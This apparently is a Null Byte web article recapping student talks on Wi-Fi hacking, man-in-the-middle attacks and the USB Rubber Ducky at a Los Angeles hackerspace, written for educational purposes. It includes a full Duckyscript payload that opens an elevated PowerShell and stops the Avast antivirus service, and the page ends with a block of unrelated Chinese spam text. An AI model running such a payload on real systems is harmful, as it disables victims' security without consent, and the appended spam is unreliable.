How To: Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

Null Space Labs, a hackerspace in Los Angeles, to test the waters by hosting a series of talks on ethical hacking for students in Pasadena Computer Science Club. We invited students and Null Byte writers to deliver talks on Wi-Fi hacking, MITM attacks, and rogue devices like the USB Rubber Ducky.

(1) Pasadena CS Students attend Null Byte and Null Space Labs's Ethical Hacking talk. (2) Our "Google Starbucks" network demonstrating how to capture wireless hosts. (3) Kody Kinzie explains the attackers behind Wi-Fi hacking. (4) Ian explaining how to encode IP addresses to hide them from firewalls. Images via Null Byte

While our first live stream started slightly delayed, our group of writers and students is excited to bring you the first of our workshops and presentations. Below, you can catch the recorded streams of the events, as well as the decks from each talk where applicable.

Wi-Fi Hacking: Who Hacks Wi-Fi & What Tools Do They Use?

By Kody Kinzie

Kody Kinzie speaks on Wi-Fi hacking threats in 2017. Image via Null Byte

Use of Wi-Fi is incredibly widespread in 2017. In the city of Los Angeles alone, there are hundreds of thousands of wireless networks, many of which touch critical infrastructure. Kody Kinzie is a CS student researching Wi-Fi security, and the tactics people use to break it.

Kody explains the tactics currently used to break or bypass the technology that makes Wi-Fi secure, and the motivations behind groups who hack Wi-Fi in 2017. In addition, the basic tools used by each threat group are discussed relative to how much skill is required to use them.

Check out these related articles:

Password Cracking Cracking WPA2-PSK Passwords Using Aircrack-Ng

Evil Twin: Capturing WPA Passwords by Targeting Users with a Fluxion Attack

Custom Wordlists: How to Crack Passwords, Creating a Custom Wordlist with Crunch

Reaver Attacks: Hack WPA Wi-Fi Passwords by Cracking the WPS PIN

MITM Attacks: Network Sniffing Over Routers/Switches

By Ian O'Neill

Ian O'Neill explains MITM attacks to computer science students. Image via Null Byte

Man in the Middle attacks intercept and redirect traffic, and can be extremely dangerous when employed correctly. Ian O'Neill explains in detail the fundamentals of a MITM attack, from creating a fake network to downgrading HTTPS connections to HTTP.

MITM attacks continue to present a viable threat when users fall for phishing and ignore warnings, in spite of the trend towards HTTPS and more secure internet connections. Take a trip to the dark side with us to explore the hands-on ways an attacker can employ an effective MITM attack.

Check out these related articles:

MTIM Tools: Build a Man-in-the-Middle Tool with Scapy and Python

MITM Attacks: How to Conduct a Simple Man-in-the-Middle Attack

MITM Framework: Build a Pumpkin Pi — The Rogue AP & MITM Framework That Fits in Your Pocket

Rogue Devices: Antivirus Disabler Script on the USB Rubber Ducky

By Tim Schellin

Tim demonstrates a USB Rubber Ducky payload. Image via Null Byte

Antivirus is the first line of defense for most systems, allowing even well-crafted malware to be defeated before deploying a payload. Timothy Shellion is a CS student using the USB Rubber Ducky to design payloads to defeat antivirus, and explains what a rogue device like a USB Rubber Ducky is, and how it works.

Timothy demonstrates his simple Duckyscript code to disable antivirus on Windows, and explains how the device can be used to defeat even well-defended systems when physical access is achieved. The potential of this device reach far beyond simply disabling antivirus, and the process of creating a payload for a rogue device is explained.

You can see Tim's Duckyscript to disable Windows Antivirus here:

DELAY 300
GUI s
DELAY 300
STRING powershell
DELAY 500
CTRL-SHIFT ENTER
DELAY 500
STRING get-service
ENTER
DELAY 750
STRING stop-service -force "avast! antivirus"
ENTER
DELAY 750
ENTER
DELAY 500
STRING get-service "avast! antivirus"
ENTER

Check out these related articles:

Automate Hacking: Automate Hacking on the Raspberry Pi with the USB Rubber Ducky

Steal Files: Steal macOS Files with the USB Rubber Ducky

Custom Firmware: Modify the USB Rubber Ducky with Custom Firmware

Want More Video Content?

If you enjoyed this and would like to see more video content, let us know in the comments below. Thank you to Null Space Labs, and Pasadena Computer Science Club for helping us put on our first Null Byte event. If you're in the SoCal area and interested in getting involved in our of our talks or workshops, please reach out to us on Twitter!

  • Follow Null Byte on Twitter and Google+
  • Follow WonderHowTo on Facebook, Twitter, Pinterest, and Google+

Just updated your iPhone? You'll find new features for Podcasts, News, Books, and TV, as well as important security improvements and fresh wallpapers. Find out what's new and changed on your iPhone with the iOS 17.5 update.

Cover photo by Null Byte

Related

Be the First to Comment

  • Hot
  • Latest
  • How to Hack Wi-Fi: Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher

  • How To: Exploit EternalBlue on Windows Server with Metasploit

  • How To: Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets

  • BT Recon: How to Snoop on Bluetooth Devices Using Kali Linux

  • How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack

  • How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019

  • The Hacks of Mr. Robot: How to Hide Data in Audio Files

  • How To: Increase TX-Power in Kali 2.0

  • How To: Crack SSH Private Key Passwords with John the Ripper

  • How To: Find Identifying Information from a Phone Number Using OSINT Tools

  • How To: Gain SSH Access to Servers by Brute-Forcing Credentials

  • How To: Brute-Force Nearly Any Website Login with Hatch

  • Hack Like a Pro: How to Find Directories in Websites Using DirBuster

  • How To: Use Kismet to Watch Wi-Fi User Activity Through Walls

  • How To: Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi Adapter

  • How To: Use SpiderFoot for OSINT Gathering

  • How To: Bypass File Upload Restrictions on Web Apps to Get a Shell

  • How To: Target Bluetooth Devices with Bettercap

  • How To: Spy on Network Relationships with Airgraph-Ng

  • How To: Hack Wireless Router Passwords & Networks Using Hydra

  • All Hot Posts

两个鬼故事魔兽世界3.35下载天骄战纪拍拍贷鼠女孩起名大全起昵称小名依据五行八字起名广袤无垠起个霸气得网名子弹上膛下载艺术设计联盟碌碌无为的意思龙凤胎宝宝取名起名大全龙凤胎宝宝起名席爷每天都想官宣给宝宝起名检测写给室起名字大全刘特个人资料介绍笔记本连接电视服装系列名称起名天然气灶什么牌子好会声会影11一路向西完整版成语 起名大全cctv8直播鼠的宝宝起名字大全沦落的五课瑞博官方网站易姓男孩起名字大全择天记动画起名的伊字的意思少年生前被连续抽血16次?多部门介入两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”淀粉肠小王子日销售额涨超10倍高中生被打伤下体休学 邯郸通报单亲妈妈陷入热恋 14岁儿子报警何赛飞追着代拍打雅江山火三名扑火人员牺牲系谣言张家界的山上“长”满了韩国人?男孩8年未见母亲被告知被遗忘中国拥有亿元资产的家庭达13.3万户19岁小伙救下5人后溺亡 多方发声315晚会后胖东来又人满为患了张立群任西安交通大学校长“重生之我在北大当嫡校长”男子被猫抓伤后确诊“猫抓病”测试车高速逃费 小米:已补缴周杰伦一审败诉网易网友洛杉矶偶遇贾玲今日春分倪萍分享减重40斤方法七年后宇文玥被薅头发捞上岸许家印被限制高消费萧美琴窜访捷克 外交部回应联合利华开始重组专访95后高颜值猪保姆胖东来员工每周单休无小长假男子被流浪猫绊倒 投喂者赔24万小米汽车超级工厂正式揭幕黑马情侣提车了西双版纳热带植物园回应蜉蝣大爆发当地回应沈阳致3死车祸车主疑毒驾恒大被罚41.75亿到底怎么缴妈妈回应孩子在校撞护栏坠楼外国人感慨凌晨的中国很安全杨倩无缘巴黎奥运校方回应护栏损坏小学生课间坠楼房客欠租失踪 房东直发愁专家建议不必谈骨泥色变王树国卸任西安交大校长 师生送别手机成瘾是影响睡眠质量重要因素国产伟哥去年销售近13亿阿根廷将发行1万与2万面值的纸币兔狲“狲大娘”因病死亡遭遇山火的松茸之乡“开封王婆”爆火:促成四五十对奥巴马现身唐宁街 黑色着装引猜测考生莫言也上北大硕士复试名单了德国打算提及普京时仅用姓名天水麻辣烫把捣辣椒大爷累坏了

两个鬼故事 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化